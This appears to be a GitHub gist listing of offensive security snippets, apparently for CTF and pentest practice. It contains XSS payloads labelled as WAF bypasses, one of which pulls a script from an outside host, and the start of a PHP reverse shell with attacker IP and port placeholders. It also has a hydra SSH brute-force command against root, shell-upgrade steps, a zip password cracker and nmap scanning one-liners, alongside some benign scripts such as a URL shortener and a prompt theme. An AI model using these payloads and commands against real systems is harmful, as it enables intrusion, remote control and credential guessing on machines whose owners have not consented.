Skip to content

Instantly share code, notes, and snippets.

View RajChowdhury240's full-sized avatar
💻
just another learner

Raj Chowdhury RajChowdhury240

💻
just another learner
320 followers · 403 following
  • Confidential
  • $ aws sts get-caller-identity
  • 19:52 (UTC +10:00)
View GitHub Profile
@RajChowdhury240
RajChowdhury240 / XSS Payloads (WAF Bypass)
Created June 13, 2020 10:57
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@RajChowdhury240
RajChowdhury240 / tny
Last active November 26, 2020 07:16
Url link shortner Bash Script
#!/bin/sh
if [ -t 0 ]; then
if [ -z "$1" ]; then
echo "usage: tny long_url [custom_keyword]"
echo ""
echo "Shorten URLs with tny.im URL shortener"
echo "This script expects a long URL to shorten either as an argument or passed through STDIN."
echo "When using arguments, an optional second argument can be provided to customize the later part of the short URL (keyword)."
exit 1
fi
@RajChowdhury240
RajChowdhury240 / Fancy-Bash.sh
Created December 19, 2020 22:36
Make Your Terminal{Bash} Look Good !!
#!/bin/sh
##
## INSTALLATION:
## Copy this script to your home folder and rename it to ".fancy-bash-promt.sh"
## Run this command from any terminal:
## echo "source ~/.fancy-bash-promt.sh" >> ~/.bashrc
##
## Alternatively, copy the content of this file into your .bashrc file
##
@RajChowdhury240
RajChowdhury240 / SSH Tunneling.sh
Last active April 5, 2021 20:54
SSH Tunneling (a.k.a. Port Forwarding)
SSH Tunneling (a.k.a. Port Forwarding)
===
This is how it works:
1. On the remote machine, the web server is running using whatever (maybe **non-public**) port we like (e.g. `9876`)
1. Use SSH to connect to the remote machine, but in a specific way that will forward a port on the remote machine to a port on our local computer (e.g. `8080`) -- this is the important part
1. On our local computer, we use our web browser to access the web server by providing the following URL address: `http://localhost:8080`
The important part
@RajChowdhury240
RajChowdhury240 / recursive-zip.sh
Created February 22, 2021 03:00
A recursive Zip file cracker Script for CTF solves
#!/usr/bin/env bash
while [ -e *.zip ]; do
files=*.zip;
for file in $files; do
echo -n "Cracking ${file}… ";
output="$(fcrackzip -u -l 1-6 -c '1' *.zip | tr -d '\n')";
password="${output/PASSWORD FOUND\!\!\!\!: pw == /}";
if [ -z "${password}" ]; then
echo "Failed to find password";
@RajChowdhury240
RajChowdhury240 / Upgrade Shell
Created February 22, 2021 03:01
Upgrade Shell
python3 -c'import pty; pty.spawn("/bin/bash")'
Background Session with ctrl + z
stty raw -echo
stty -a
@RajChowdhury240
RajChowdhury240 / rev-shell.php
Created February 22, 2021 03:03
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = 'insert ip here'; // CHANGE THIS
$port = 1337; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
@RajChowdhury240
RajChowdhury240 / find-js-endpoint.sh
Created February 22, 2021 03:07
js file finder one liner
echo target.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'
@RajChowdhury240
RajChowdhury240 / ssh-brute-force.sh
Created February 22, 2021 03:08
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 -t 4 ssh
@RajChowdhury240
RajChowdhury240 / nmap-full-scanner.sh
Created February 22, 2021 03:09
ports=$(nmap -p- --min-rate=1000 -T4 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports $1